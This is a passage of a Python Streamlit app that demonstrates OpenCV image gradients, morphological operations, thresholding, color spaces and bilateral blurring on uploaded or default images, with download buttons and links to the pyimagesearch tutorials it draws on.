cols[2].image(gY)
with cols[2]:
download_button1(gY, button, download, mime_type, key='2.2')
cols[3].markdown("Sobel/Scharr Combined")
cols[3].image(combined)
with cols[3]:
download_button1(combined, button, download, mime_type, key='2.3')
else:
img_file = st.file_uploader(label='Upload a file', type=['png', 'jpg', 'jpge'])
realtime_update = st.sidebar.checkbox(label="Update in Real Time", value=True)
if img_file is not None:
# load the input image and convert it to grayscale
image = load_image_PIL(img_file)
image = converted(image)
gray = cv.cvtColor(image, cv.COLOR_BGR2GRAY)
# compute gradients along the x and y axis, respectively
gX = cv.Sobel(gray, cv.CV_64F, 1, 0)
gY = cv.Sobel(gray, cv.CV_64F, 0, 1)
# compute the gradient magnitude and orientation
magnitude = np.sqrt((gX ** 2) + (gY ** 2))
orientation = np.arctan2(gY, gX) * (180 / np.pi) % 180
#arr = np.uint8(magnitude)
dist1 = cv.convertScaleAbs(magnitude)
imC1 = cv.applyColorMap(dist1, cv.COLORMAP_JET)
dist2 = cv.convertScaleAbs(orientation)
imC2 = cv.applyColorMap(dist2, cv.COLORMAP_JET)
# display all images
with st.expander('Show Magnitude - Orientation Image Gradients - Streamlit', expanded=True):
cols = st.columns(3)
cols[0].markdown("Grayscale")
cols[0].image(gray)
cols[1].markdown("Gradient Magnitude")
cols[1].image(imC1, channels='BGR')
with cols[1]:
download_button1(imC1, button, download, mime_type, key='3.1')
cols[2].markdown("Gradient Orientation [0, 180]")
cols[2].image(imC2, channels='BGR')
with cols[2]:
download_button1(imC2, button, download, mime_type, key='3.2')
# initialize a figure to display the input grayscle image along with
# the gradient magnitude and orientation representations, respectively
(fig, axs) = plt.subplots(nrows=1, ncols=3, figsize=(8, 4))
# plot each of the images
axs[0].imshow(gray, cmap="gray")
axs[1].imshow(magnitude, cmap="jet")
axs[2].imshow(orientation, cmap="jet")
# set the titles of each axes
axs[0].set_title("Grayscale")
axs[1].set_title("Gradient Magnitude")
axs[2].set_title("Gradient Orientation [0, 180]")
# loop over each of the axes and turn off the x and y ticks
for i in range(0, 3):
axs[i].get_xaxis().set_ticks([])
axs[i].get_yaxis().set_ticks([])
with st.expander('Show Magnitude - Orientation Image Gradients - Mapplotlib'):
# show the plots
plt.tight_layout()
st.pyplot(fig)
else:
# load the input image and convert it to grayscale
image = load_image(default_image)
gray = cv.cvtColor(image, cv.COLOR_BGR2GRAY)
# compute gradients along the x and y axis, respectively
gX = cv.Sobel(gray, cv.CV_64F, 1, 0)
gY = cv.Sobel(gray, cv.CV_64F, 0, 1)
# compute the gradient magnitude and orientation
magnitude = np.sqrt((gX ** 2) + (gY ** 2))
orientation = np.arctan2(gY, gX) * (180 / np.pi) % 180
#arr = np.uint8(magnitude)
dist1 = cv.convertScaleAbs(magnitude)
imC1 = cv.applyColorMap(dist1, cv.COLORMAP_OCEAN)
dist2 = cv.convertScaleAbs(orientation)
imC2 = cv.applyColorMap(dist2, cv.COLORMAP_JET)
# display all images
with st.expander('Show Magnitude - Orientation Image Gradients - Streamlit', expanded=True):
cols = st.columns(3)
cols[0].markdown("Grayscale")
cols[0].image(gray)
cols[1].markdown("Gradient Magnitude")
cols[1].image(imC1, clamp=False)
with cols[1]:
download_button1(imC1, button, download, mime_type, key='5.1')
cols[2].markdown("Gradient Orientation [0, 180]")
cols[2].image(imC2, clamp=True)
with cols[2]:
download_button1(imC2, button, download, mime_type, key='5.2')
# initialize a figure to display the input grayscle image along with
# the gradient magnitude and orientation representations, respectively
(fig, axs) = plt.subplots(nrows=1, ncols=3, figsize=(8, 4))
# plot each of the images
axs[0].imshow(gray, cmap="gray")
axs[1].imshow(magnitude, cmap="jet")
axs[2].imshow(orientation, cmap="jet")
# set the titles of each axes
axs[0].set_title("Grayscale")
axs[1].set_title("Gradient Magnitude")
axs[2].set_title("Gradient Orientation [0, 180]")
# loop over each of the axes and turn off the x and y ticks
for i in range(0, 3):
axs[i].get_xaxis().set_ticks([])
axs[i].get_yaxis().set_ticks([])
with st.expander('Show Magnitude - Orientation Image Gradients - Mapplotlib'):
# show the plots
plt.tight_layout()
st.pyplot(fig)
source_code(
'Source Code + Image Gradients Tutorial pyimagesearch.com',
'https://pyimagesearch.com/2021/05/12/image-gradients-with-opencv-sobel-and-scharr/',
'https://gist.github.com/jjaramillo34/4a40d2faeddda4c1275b2c40c86260a4')
with st.expander('DuckDuckGo Search Results'):
st.subheader('More About Morphological Operations')
scrape_duckduckgo('morphological operations opencv')
def morphological_operations():
st.header("Morphological Operations Demo")
options = st.sidebar.radio('Morphological Operations Options', ('Morphological Hats', 'Morphological Operations'))
if options == 'Morphological Hats':
img_file = st.file_uploader(label='Upload a file', type=['png', 'jpg', 'jpge'])
realtime_update = st.sidebar.checkbox(label="Update in Real Time", value=True)
if img_file is not None:
# load the image and convert it to grayscale
image = load_image_PIL(img_file)
image = converted(image)
gray = cv.cvtColor(image, cv.COLOR_BGR2GRAY)
# construct a rectangular kernel (13x5) and apply a blackhat operation which enables
# us to find dark regions on a light background
rectKernel = cv.getStructuringElement(cv.MORPH_RECT, (13, 5))
blackhat = cv.morphologyEx(gray, cv.MORPH_BLACKHAT, rectKernel)
# similarly, a tophat (also called a "whitehat") operation will enable us to find light
# regions on a dark background
tophat = cv.morphologyEx(gray, cv.MORPH_TOPHAT, rectKernel)
st.subheader('Morphological Hats')
# show the output images
with st.expander('Show Original Image'):
st.markdown("Original")
st.image(image)
with st.expander('Show Morphological Hats', expanded=True):
cols = st.columns(2)
cols[0].markdown("Blackhat")
cols[0].image(blackhat)
with cols[0]:
download_button1(blackhat, button, download, mime_type, key='1.1')
cols[1].markdown("Tophat")
cols[1].image(tophat)
with cols[1]:
download_button1(tophat, button, download, mime_type, key='1.2')
else:
# load the image and convert it to grayscale
image = load_image('images/pyimagesearch_logo_noise.png')
gray = cv.cvtColor(image, cv.COLOR_BGR2GRAY)
# construct a rectangular kernel (13x5) and apply a blackhat operation which enables
# us to find dark regions on a light background
rectKernel = cv.getStructuringElement(cv.MORPH_RECT, (13, 5))
blackhat = cv.morphologyEx(gray, cv.MORPH_BLACKHAT, rectKernel)
# similarly, a tophat (also called a "whitehat") operation will enable us to find light
# regions on a dark background
tophat = cv.morphologyEx(gray, cv.MORPH_TOPHAT, rectKernel)
st.subheader('Morphological Hats')
# show the output images
with st.expander('Show Original Image'):
st.markdown("Original")
st.image(image)
with st.expander('Show Morphological Hats', expanded=True):
cols = st.columns(2)
cols[0].markdown("Blackhat")
cols[0].image(blackhat)
with cols[0]:
download_button1(blackhat, button, download, mime_type, key='1.1')
cols[1].markdown("Tophat")
cols[1].image(tophat)
with cols[1]:
download_button1(tophat, button, download, mime_type, key='1.2')
else:
img_file = st.file_uploader(label='Upload a file', type=['png', 'jpg', 'jpge'])
realtime_update = st.sidebar.checkbox(label="Update in Real Time", value=True)
if img_file is not None:
# load the image, convert it to grayscale, and display it to our screen
image = load_image_PIL(img_file)
image = converted(image)
gray = cv.cvtColor(image, cv.COLOR_BGR2GRAY)
with st.expander('Show Morphological Operations - Erosion', expanded=True):
cols = st.columns(4)
cols[0].markdown("Original")
cols[0].image(image)
# apply a series of erosions
for i in range(0, 3):
eroded = cv.erode(gray.copy(), None, iterations=i + 1)
cols[i+1].markdown("Eroded {} times".format(i + 1))
cols[i+1].image(eroded)
with cols[i+1]:
download_button1(eroded, button, download, mime_type, key=f'{i}.{i}')
with st.expander('Show Morphological Operations - Dilation'):
cols = st.columns(4)
cols[0].markdown("Original")
cols[0].image(image)
# apply a series of dilations
for i in range(0, 3):
dilated = cv.dilate(gray.copy(), None, iterations=i + 1)
cols[i+1].markdown("Dilated {} times".format(i + 1))
cols[i+1].image(dilated)
with cols[i+1]:
download_button1(dilated, button, download, mime_type, key=f'{i}.{i}')
with st.expander('Show Morphological Operations - Opening'):
# initialize a list of kernels sizes that will be applied to the image
cols = st.columns(4)
cols[0].markdown("Original")
cols[0].image(image)
kernelSizes = [(3, 3), (5, 5), (7, 7)]
# loop over the kernels sizes
for i, kernelSize in enumerate(kernelSizes):
# construct a rectangular kernel from the current size and then
# apply an "opening" operation
kernel = cv.getStructuringElement(cv.MORPH_RECT, kernelSize)
opening = cv.morphologyEx(gray, cv.MORPH_OPEN, kernel)
cols[i+1].markdown("Opening: ({}, {})".format(
kernelSize[0], kernelSize[1]))
cols[i+1].image(opening)
with cols[i+1]:
download_button1(opening, button, download, mime_type, key=f'{i}.{i}')
with st.expander('Show Morphological Operations - Closing'):
cols = st.columns(4)
cols[0].markdown("Original")
cols[0].image(image)
# loop over the kernels sizes again
for i, kernelSize in enumerate(kernelSizes):
# construct a rectangular kernel form the current size, but this
# time apply a "closing" operation
kernel = cv.getStructuringElement(cv.MORPH_RECT, kernelSize)
closing = cv.morphologyEx(gray, cv.MORPH_CLOSE, kernel)
cols[i+1].markdown("Closing: ({}, {})".format(
kernelSize[0], kernelSize[1]))
cols[i+1].image(closing)
with cols[i+1]:
download_button1(closing, button, download, mime_type, key=f'{i}.{i}')
with st.expander('Show Morphological Operations - Gradient'):
cols = st.columns(4)
cols[0].markdown("Original")
cols[0].image(image)
# loop over the kernels a final time
for i, kernelSize in enumerate(kernelSizes):
# construct a rectangular kernel and apply a "morphological
# gradient" operation to the image
kernel = cv.getStructuringElement(cv.MORPH_RECT, kernelSize)
gradient = cv.morphologyEx(gray, cv.MORPH_GRADIENT, kernel)
cols[i+1].markdown("Gradient: ({}, {})".format(
kernelSize[0], kernelSize[1]))
cols[i+1].image(gradient)
with cols[i+1]:
download_button1(gradient, button, download, mime_type, key=f'{i}.{i}')
with st.expander('Show Interactive Morphological Operations - Erosion, Dilation', expanded=True):
x = st.number_input('Erored-Dilated Iterations', 1, 6)
cols = st.columns(3)
cols[0].markdown("Original")
cols[0].image(image)
eroded = cv.erode(gray.copy(), None, iterations=x)
cols[1].markdown("Eroded {} times".format(x))
cols[1].image(eroded)
with cols[1]:
download_button1(eroded, button, download, mime_type, key='4.1')
dilated = cv.dilate(gray.copy(), None, iterations=x)
cols[2].markdown("Dilated {} times".format(x))
cols[2].image(dilated)
with cols[2]:
download_button1(dilated, button, download, mime_type, key='4.2')
with st.expander('Show Interactive Morphological Operations - Opening, Closing & Gradient'):
kX = st.number_input('Opening, Closing & Gradient Kernel Size', 1, 11, step=2)
kY = st.number_input('Opening, Closing & Gradient Kernel Size', int(kX), 11, step=2, disabled=True)
kernelSize = [(kX, kY)]
cols = st.columns(4)
cols[0].markdown("Original")
cols[0].image(image)
kernel = cv.getStructuringElement(cv.MORPH_RECT, (kX, kY))
opening = cv.morphologyEx(gray, cv.MORPH_OPEN, kernel)
cols[1].markdown("Opening: ({}, {})".format(
kernelSize[0][0], kernelSize[0][1]))
cols[1].image(opening)
with cols[1]:
download_button1(eroded, button, download, mime_type, key='5.1')
kernel = cv.getStructuringElement(cv.MORPH_RECT, (kX, kY))
closing = cv.morphologyEx(gray, cv.MORPH_CLOSE, kernel)
cols[2].markdown("Closing: ({}, {})".format(
kernelSize[0][0], kernelSize[0][1]))
cols[2].image(closing)
with cols[2]:
download_button1(closing, button, download, mime_type, key='5.2')
kernel = cv.getStructuringElement(cv.MORPH_RECT, (kX, kY))
gradient = cv.morphologyEx(gray, cv.MORPH_GRADIENT, kernel)
cols[3].markdown("Gradient: ({}, {})".format(
kernelSize[0][0], kernelSize[0][1]))
cols[3].image(gradient)
with cols[3]:
download_button1(gradient, button, download, mime_type, key='5.3')
else:
# load the image, convert it to grayscale, and display it to our screen
image = load_image('images/pyimagesearch_logo_noise.png')
gray = cv.cvtColor(image, cv.COLOR_BGR2GRAY)
with st.expander('Show Morphological Operations - Erosion', expanded=True):
cols = st.columns(4)
cols[0].markdown("Original")
cols[0].image(image)
# apply a series of erosions
for i in range(0, 3):
eroded = cv.erode(gray.copy(), None, iterations=i + 1)
cols[i+1].markdown("Eroded {} times".format(i + 1))
cols[i+1].image(eroded)
with cols[i+1]:
download_button1(eroded, button, download, mime_type, key=f'{i}.{i}')
with st.expander('Show Morphological Operations - Dilation'):
cols = st.columns(4)
cols[0].markdown("Original")
cols[0].image(image)
# apply a series of dilations
for i in range(0, 3):
dilated = cv.dilate(gray.copy(), None, iterations=i + 1)
cols[i+1].markdown("Dilated {} times".format(i + 1))
cols[i+1].image(dilated)
with cols[i+1]:
download_button1(dilated, button, download, mime_type, key=f'{i}.{i}')
with st.expander('Show Morphological Operations - Opening'):
# initialize a list of kernels sizes that will be applied to the image
cols = st.columns(4)
cols[0].markdown("Original")
cols[0].image(image)
kernelSizes = [(3, 3), (5, 5), (7, 7)]
# loop over the kernels sizes
for i, kernelSize in enumerate(kernelSizes):
# construct a rectangular kernel from the current size and then
# apply an "opening" operation
kernel = cv.getStructuringElement(cv.MORPH_RECT, kernelSize)
opening = cv.morphologyEx(gray, cv.MORPH_OPEN, kernel)
cols[i+1].markdown("Opening: ({}, {})".format(
kernelSize[0], kernelSize[1]))
cols[i+1].image(opening)
with cols[i+1]:
download_button1(opening, button, download, mime_type, key=f'{i}.{i}')
with st.expander('Show Morphological Operations - Closing'):
cols = st.columns(4)
cols[0].markdown("Original")
cols[0].image(image)
# loop over the kernels sizes again
for i, kernelSize in enumerate(kernelSizes):
# construct a rectangular kernel form the current size, but this
# time apply a "closing" operation
kernel = cv.getStructuringElement(cv.MORPH_RECT, kernelSize)
closing = cv.morphologyEx(gray, cv.MORPH_CLOSE, kernel)
cols[i+1].markdown("Closing: ({}, {})".format(
kernelSize[0], kernelSize[1]))
cols[i+1].image(closing)
with cols[i+1]:
download_button1(closing, button, download, mime_type, key=f'{i}.{i}')
with st.expander('Show Morphological Operations - Gradient'):
cols = st.columns(4)
cols[0].markdown("Original")
cols[0].image(image)
# loop over the kernels a final time
for i, kernelSize in enumerate(kernelSizes):
# construct a rectangular kernel and apply a "morphological
# gradient" operation to the image
kernel = cv.getStructuringElement(cv.MORPH_RECT, kernelSize)
gradient = cv.morphologyEx(gray, cv.MORPH_GRADIENT, kernel)
cols[i+1].markdown("Gradient: ({}, {})".format(
kernelSize[0], kernelSize[1]))
cols[i+1].image(gradient)
with cols[i+1]:
download_button1(gradient, button, download, mime_type, key=f'{i}.{i}')
with st.expander('Show Interactive Morphological Operations - Erosion, Dilation', expanded=True):
x = st.number_input('Erored-Dilated Iterations', 1, 6)
cols = st.columns(3)
cols[0].markdown("Original")
cols[0].image(image)
eroded = cv.erode(gray.copy(), None, iterations=x)
cols[1].markdown("Eroded {} times".format(x))
cols[1].image(eroded)
with cols[1]:
download_button1(eroded, button, download, mime_type, key='6.1')
dilated = cv.dilate(gray.copy(), None, iterations=x)
cols[2].markdown("Dilated {} times".format(x))
cols[2].image(dilated)
with cols[2]:
download_button1(dilated, button, download, mime_type, key='6.2')
with st.expander('Show Interactive Morphological Operations - Opening, Closing & Gradient'):
kX = st.number_input('Opening, Closing & Gradient Kernel Size', 1, 11, step=2)
kY = st.number_input('Opening, Closing & Gradient Kernel Size', kX, 11, step=2, disabled=True)
kernelSize = [(kX, kY)]
cols = st.columns(4)
cols[0].markdown("Original")
cols[0].image(image)
kernel = cv.getStructuringElement(cv.MORPH_RECT, (kX, kY))
opening = cv.morphologyEx(gray, cv.MORPH_OPEN, kernel)
cols[1].markdown("Opening: ({}, {})".format(
kernelSize[0][0], kernelSize[0][1]))
cols[1].image(opening)
with cols[1]:
download_button1(eroded, button, download, mime_type, key='7.1')
kernel = cv.getStructuringElement(cv.MORPH_RECT, (kX, kY))
closing = cv.morphologyEx(gray, cv.MORPH_CLOSE, kernel)
cols[2].markdown("Closing: ({}, {})".format(
kernelSize[0][0], kernelSize[0][1]))
cols[2].image(closing)
with cols[2]:
download_button1(closing, button, download, mime_type, key='7.2')
kernel = cv.getStructuringElement(cv.MORPH_RECT, (kX, kY))
gradient = cv.morphologyEx(gray, cv.MORPH_GRADIENT, kernel)
cols[3].markdown("Gradient: ({}, {})".format(
kernelSize[0][0], kernelSize[0][1]))
cols[3].image(gradient)
with cols[3]:
download_button1(gradient, button, download, mime_type, key='7.3')
source_code(
'Source Code + Morphological Operations Tutorial pyimagesearch.com',
'https://pyimagesearch.com/2021/04/28/opencv-morphological-operations/',
'https://gist.github.com/jjaramillo34/3c1a8489e7882a3dba1127f3046c2a78')
with st.expander('DuckDuckGo Search Results'):
st.subheader('More About Morphological Operations')
scrape_duckduckgo('morphological operations opencv')
def thresholding():
st.header("Thresholding Demo")
options = st.sidebar.radio('Thresholding Options', ('Simple Thresholding', "Otsu's Thresholding"))
realtime_update = st.sidebar.checkbox(label="Update in Real Time", value=True)
if options == 'Simple Thresholding':
img_file = st.file_uploader(label='Upload a file', type=['png', 'jpg', 'jpge'])
if img_file is not None:
image = load_image_PIL(img_file)
image = converted(image)
with st.expander('Show Original Image'):
st.markdown(original)
st.image(image)
# convert the image to grayscale and blur it slightly
gray = cv.cvtColor(image, cv.COLOR_BGR2GRAY)
blurred = cv.GaussianBlur(gray, (7, 7), 0)
with st.expander('Show Simple Thresholding', expanded=True):
cols = st.columns(3)
# apply basic thresholding -- the first parameter is the image we want to thhreshold, the second value
# is our threshold check; if a pixel value is greater than out threshold (in this case, 200), we set
# it to be *black, otherwise it is *white*
(T, threshInv) = cv.threshold(blurred, 200, 255, cv.THRESH_BINARY_INV)
cols[0].markdown("Threshold Binary Inverse")
cols[0].image(threshInv)
with cols[0]:
download_button1(threshInv, button, download, mime_type, key='1.1')
# using normal thresholding (rather than inverse thresholding)
(T, thresh) = cv.threshold(blurred, 200, 255, cv.THRESH_BINARY)
cols[1].markdown("Threshold Binary")
cols[1].image(thresh)
with cols[1]:
download_button1(thresh, button, download, mime_type, key='1.2')
# visualize only the masted regions in the image
masked = cv.bitwise_and(image, image, mask=threshInv)
cols[2].markdown("Masked")
cols[2].image(masked)
with cols[2]:
download_button1(masked, button, download, mime_type, key='1.3')
with st.expander('Show Simple Thresholding Auto', expanded=True):
x = st.slider('Change Threshold value', min_value = 50, max_value = 255)
cols = st.columns(3)
# apply basic thresholding -- the first parameter is the image we want to thhreshold, the second value
# is our threshold check; if a pixel value is greater than out threshold (in this case, 200), we set
# it to be *black, otherwise it is *white*
(T, threshInv) = cv.threshold(blurred, x, 255, cv.THRESH_BINARY_INV)
cols[0].markdown("Threshold Binary Inverse")
cols[0].image(threshInv)
with cols[0]:
download_button1(threshInv, button, download, mime_type, key='2.1')
# using normal thresholding (rather than inverse thresholding)
(T, thresh) = cv.threshold(blurred, x, 255, cv.THRESH_BINARY)
cols[1].markdown("Threshold Binary")
cols[1].image(thresh)
with cols[1]:
download_button1(thresh, button, download, mime_type, key='2.2')
# visualize only the masted regions in the image
masked = cv.bitwise_and(image, image, mask=threshInv)
cols[2].markdown("Masked")
cols[2].image(masked)
with cols[2]:
download_button1(masked, button, download, mime_type, key='2.3')
else:
image = load_image(default_image)
with st.expander('Show Original Image'):
st.markdown(original)
st.image(image)
# convert the image to grayscale and blur it slightly
gray = cv.cvtColor(image, cv.COLOR_BGR2GRAY)
blurred = cv.GaussianBlur(gray, (7, 7), 0)
with st.expander('Show Simple Thresholding', expanded=True):
cols = st.columns(3)
# apply basic thresholding -- the first parameter is the image we want to thhreshold, the second value
# is our threshold check; if a pixel value is greater than out threshold (in this case, 200), we set
# it to be *black, otherwise it is *white*
(T, threshInv) = cv.threshold(blurred, 200, 255, cv.THRESH_BINARY_INV)
cols[0].markdown("Threshold Binary Inverse")
cols[0].image(threshInv)
with cols[0]:
download_button1(threshInv, button, download, mime_type, key='1.1')
# using normal thresholding (rather than inverse thresholding)
(T, thresh) = cv.threshold(blurred, 200, 255, cv.THRESH_BINARY)
cols[1].markdown("Threshold Binary")
cols[1].image(thresh)
with cols[1]:
download_button1(thresh, button, download, mime_type, key='1.2')
# visualize only the masted regions in the image
masked = cv.bitwise_and(image, image, mask=threshInv)
cols[2].markdown("Masked")
cols[2].image(masked)
with cols[2]:
download_button1(masked, button, download, mime_type, key='1.3')
with st.expander('Show Simple Thresholding Auto', expanded=True):
x = st.slider('Change Threshold value', min_value = 50, max_value = 255)
cols = st.columns(3)
# apply basic thresholding -- the first parameter is the image we want to thhreshold, the second value
# is our threshold check; if a pixel value is greater than out threshold (in this case, 200), we set
# it to be *black, otherwise it is *white*
(T, threshInv) = cv.threshold(blurred, x, 255, cv.THRESH_BINARY_INV)
cols[0].markdown("Threshold Binary Inverse")
cols[0].image(threshInv)
with cols[0]:
download_button1(threshInv, button, download, mime_type, key='2.1')
# using normal thresholding (rather than inverse thresholding)
(T, thresh) = cv.threshold(blurred, x, 255, cv.THRESH_BINARY)
cols[1].markdown("Threshold Binary")
cols[1].image(thresh)
with cols[1]:
download_button1(thresh, button, download, mime_type, key='2.2')
# visualize only the masted regions in the image
masked = cv.bitwise_and(image, image, mask=threshInv)
cols[2].markdown("Masked")
cols[2].image(masked)
with cols[2]:
download_button1(masked, button, download, mime_type, key='2.3')
else:
img_file = st.file_uploader(label='Upload a file', type=['png', 'jpg', 'jpge'])
if img_file is not None:
# load the image and display it
image = load_image_PIL(img_file)
image = converted(image)
with st.expander('Show Original Image'):
st.markdown("Image")
st.image(image)
# convert the image to grayscale and blur it slightly
gray = cv.cvtColor(image, cv.COLOR_BGR2GRAY)
blurred = cv.GaussianBlur(gray, (7, 7), 0)
with st.expander("Show Otsu's Thresholding", expanded=True):
cols = st.columns(2)
# apply Otsu's automatic thresholding which automatically determines
# the best threshold value
(T, threshInv) = cv.threshold(blurred, 0, 255,
cv.THRESH_BINARY_INV | cv.THRESH_OTSU)
cols[0].markdown("Threshold")
cols[0].image(threshInv)
st.success("[INFO] otsu's thresholding value: {}".format(T))
with cols[0]:
download_button1(threshInv, button, download, mime_type, key='1.1')
# visualize only the masked regions in the image
masked = cv.bitwise_and(image, image, mask=threshInv)
cols[1].markdown("Output")
cols[1].image(masked)
with cols[1]:
download_button1(threshInv, button, download, mime_type, key='1.2')
else:
# load the image and display it
image = load_image(default_image)
with st.expander('Show Original Image'):
st.markdown("Image")
st.image(image)
# convert the image to grayscale and blur it slightly
gray = cv.cvtColor(image, cv.COLOR_BGR2GRAY)
blurred = cv.GaussianBlur(gray, (7, 7), 0)
with st.expander("Show Otsu's Thresholding", expanded=True):
cols = st.columns(2)
# apply Otsu's automatic thresholding which automatically determines
# the best threshold value
(T, threshInv) = cv.threshold(blurred, 0, 255,
cv.THRESH_BINARY_INV | cv.THRESH_OTSU)
cols[0].markdown("Threshold")
cols[0].image(threshInv)
st.success("[INFO] otsu's thresholding value: {}".format(T))
with cols[0]:
download_button1(threshInv, button, download, mime_type, key='2.1')
# visualize only the masked regions in the image
masked = cv.bitwise_and(image, image, mask=threshInv)
cols[1].markdown("Output")
cols[1].image(masked)
with cols[1]:
download_button1(threshInv, button, download, mime_type, key='2.2')
source_code(
'Source Code + Thresholding Tutorial pyimagesearch.com',
'https://pyimagesearch.com/2021/04/28/opencv-thresholding-cv2-threshold/',
'https://gist.github.com/jjaramillo34/d504d5a9d6f88833c3720f132e734193')
with st.expander('DuckDuckGo Search Results'):
st.subheader('More About Thesholding')
scrape_duckduckgo('opencv thresholding')
def color_spaces():
st.header("Color Spaces Demo")
img_file = st.file_uploader(label='Upload a file', type=['png', 'jpg', 'jpge'])
realtime_update = st.sidebar.checkbox(label="Update in Real Time", value=True)
if img_file is not None:
with st.expander('Show RGB Color Spaces', expanded=True):
# load the original image and show it
cols = st.columns(4)
image = load_image_PIL(img_file)
image = converted(image)
with cols[0]:
st.markdown("RGB Color Spaces")
st.image(image)
# loop over each of the individual channels and display them
for i, (name, chan) in enumerate(zip(("B", "G", "R"), cv.split(image))):
with cols[i+1]:
st.markdown(name)
st.image(chan)
download_button1(chan, button, download, mime_type, key=f'{i}.{i}')
with st.expander('Show HSV Color Spaces'):
# convert the image to the HSV color space and show it
cols = st.columns(4)
hsv = cv.cvtColor(image, cv.COLOR_BGR2HSV)
with cols[0]:
st.markdown("HSV Color Spaces")
st.image(hsv)
# loop over each of the invidiaul channels and display them
for i, (name, chan) in enumerate(zip(("H", "S", "V"), cv.split(hsv))):
with cols[i+1]:
st.markdown(name)
st.image(chan)
download_button1(chan, button, download, mime_type, key=f'{i}.{i}')
with st.expander('Show L*a*b* Color Spaces'):
# convert the image to the L*a*b* color space and show it
cols = st.columns(4)
lab = cv.cvtColor(image, cv.COLOR_BGR2LAB)
with cols[0]:
st.markdown("L*a*b*")
st.image(lab)
# loop over each of the invidiaul channels and display them
for i, (name, chan) in enumerate(zip(("L*", "a*", "b*"), cv.split(lab))):
with cols[i+1]:
st.markdown(name)
st.image(chan)
download_button1(chan, button, download, mime_type, key=f'{i}.{i}')
with st.expander('Show Grayscale'):
# show the original and grayscale versions of the image
cols = st.columns(2)
gray = cv.cvtColor(image, cv.COLOR_BGR2GRAY)
cols[0].markdown("Original")
cols[0].image(image)
with cols[0]:
download_button1(image, button, download, mime_type, key=f'2.1')
cols[1].markdown("Grayscale")
cols[1].image(gray)
with cols[1]:
download_button1(image, button, download, mime_type, key=f'2.2')
else:
with st.expander('Show RGB Color Spaces', expanded=True):
# load the original image and show it
cols = st.columns(4)
image = load_image(default_image)
with cols[0]:
st.markdown("RGB Color Spaces")
st.image(image)
# loop over each of the individual channels and display them
for i, (name, chan) in enumerate(zip(("B", "G", "R"), cv.split(image))):
with cols[i+1]:
st.markdown(name)
st.image(chan)
download_button1(chan, button, download, mime_type, key=f'{i}.{i}')
with st.expander('Show HSV Color Spaces'):
# convert the image to the HSV color space and show it
cols = st.columns(4)
hsv = cv.cvtColor(image, cv.COLOR_BGR2HSV)
with cols[0]:
st.markdown("HSV Color Spaces")
st.image(hsv)
# loop over each of the invidiaul channels and display them
for i, (name, chan) in enumerate(zip(("H", "S", "V"), cv.split(hsv))):
with cols[i+1]:
st.markdown(name)
st.image(chan)
download_button1(chan, button, download, mime_type, key=f'{i}.{i}')
with st.expander('Show L*a*b* Color Spaces'):
# convert the image to the L*a*b* color space and show it
cols = st.columns(4)
lab = cv.cvtColor(image, cv.COLOR_BGR2LAB)
with cols[0]:
st.markdown("L*a*b*")
st.image(lab)
# loop over each of the invidiaul channels and display them
for i, (name, chan) in enumerate(zip(("L*", "a*", "b*"), cv.split(lab))):
with cols[i+1]:
st.markdown(name)
st.image(chan)
download_button1(chan, button, download, mime_type, key=f'{i}.{i}')
with st.expander('Show Grayscale'):
# show the original and grayscale versions of the image
cols = st.columns(2)
gray = cv.cvtColor(image, cv.COLOR_BGR2GRAY)
cols[0].markdown("Original")
cols[0].image(image)
with cols[0]:
download_button1(image, button, download, mime_type, key=f'2.1')
cols[1].markdown("Grayscale")
cols[1].image(gray)
with cols[1]:
download_button1(image, button, download, mime_type, key=f'2.2')
source_code(
'Source Code + Color Spaces Tutorial pyimagesearch.com',
'https://pyimagesearch.com/2021/04/28/opencv-color-spaces-cv2-cvtcolor/',
'https://gist.github.com/jjaramillo34/74ef1a86014fb4fd7617c03ea10c3602')
with st.expander('DuckDuckGo Search Results'):
t = 'Color Spaces'
st.subheader(f'More About {t.capitalize()}')
scrape_duckduckgo(f'opencv {t}')
def smoothing_blurring():
st.header("Smoothing & Blurring Demo")
options = st.sidebar.radio('Smoothing & Blurring Options', ('Bilateral', 'Blurring'))
if options == 'Bilateral':
img_file = st.file_uploader(label='Upload a file', type=['png', 'jpg', 'jpge'])
realtime_update = st.sidebar.checkbox(label="Update in Real Time", value=True)
if img_file is not None:
with st.expander('Show Original Image'):
image = load_image_PIL(img_file)
image = converted(image)
st.image(image)
# hard-code parameters list
params = [(11, 21, 7), (11, 41, 21), (11, 61, 39)]
with st.expander('Bilateral Blurring', expanded=True):
st.subheader('Bilateral Blurring')
cols = st.columns(3)
# loop over the diameter, sigma color, and sigma space
for i, (diameter, sigmaColor, sigmaSpace) in enumerate(params):
# apply bilateral filtering to the image using the current set of parameters
blurred = cv.bilateralFilter(image, diameter, sigmaColor, sigmaSpace)
# show the output image and associated parameters
title = "Blurred d={}, sc={}, ss={}".format(
diameter, sigmaColor, sigmaSpace)
with cols[i]:
st.markdown(title)
st.image(blurred)
download_button1(blurred, button, download, mime_type, key=f'{i}')
with st.expander('Bilateral Blurring Interactive'):
st.subheader('Bilateral Blurring Interactive')
cols = st.columns(3)
d = cols[0].slider('Select starting diameter', min_value = 11, max_value = 100, step=1, key='1')
sc = cols[1].slider('Select starting sigmaColor', min_value = 21, max_value = 100, step=1, key='2')
ss = cols[2].slider('Select starting sigmaSpace' ,min_value = 7, max_value = 100, step=1, key='3')
blurred = cv.bilateralFilter(image, d, sc, ss)
# show the output image and associated parameters
title = "Blurred d={}, sc={}, ss={}".format(
d, sc, ss)
st.markdown(title)
st.image(blurred)
download_button1(blurred, button, download, mime_type, key='1.1')
else:
with st.expander('Show Original Image'):
image = load_image(default_image)
st.image(image)
# hard-code parameters list
params = [(11, 21, 7), (11, 41, 21), (11, 61, 39)]
with st.expander('Bilateral Blurring', expanded=True):
st.subheader('Bilateral Blurring')
cols = st.columns(3)
# loop over the diameter, sigma color, and sigma space
for i, (diameter, sigmaColor, sigmaSpace) in enumerate(params):
# apply bilateral filtering to the image using the current set of parameters
blurred = cv.bilateralFilter(image, diameter, sigmaColor, sigmaSpace)
# show the output image and associated parameters
title = "Blurred d={}, sc={}, ss={}".format(
diameter, sigmaColor, sigmaSpace)
with cols[i]:
st.markdown(title)
st.image(blurred)
download_button1(blurred, button, download, mime_type, key=f'{i}')
with st.expander('Bilateral Blurring Interactive'):
st.subheader('Bilateral Blurring Interactive')
cols = st.columns(3)
d = cols[0].slider('Select starting diameter', min_value = 11, max_value = 100, step=1, key='1')
sc = cols[1].slider('Select starting sigmaColor', min_value = 21, max_value = 100, step=1, key='2')
ss = cols[2].slider('Select starting sigmaSpace' ,min_value = 7, max_value = 100, step=1, key='3')
blurred = cv.bilateralFilter(image, d, sc, ss)
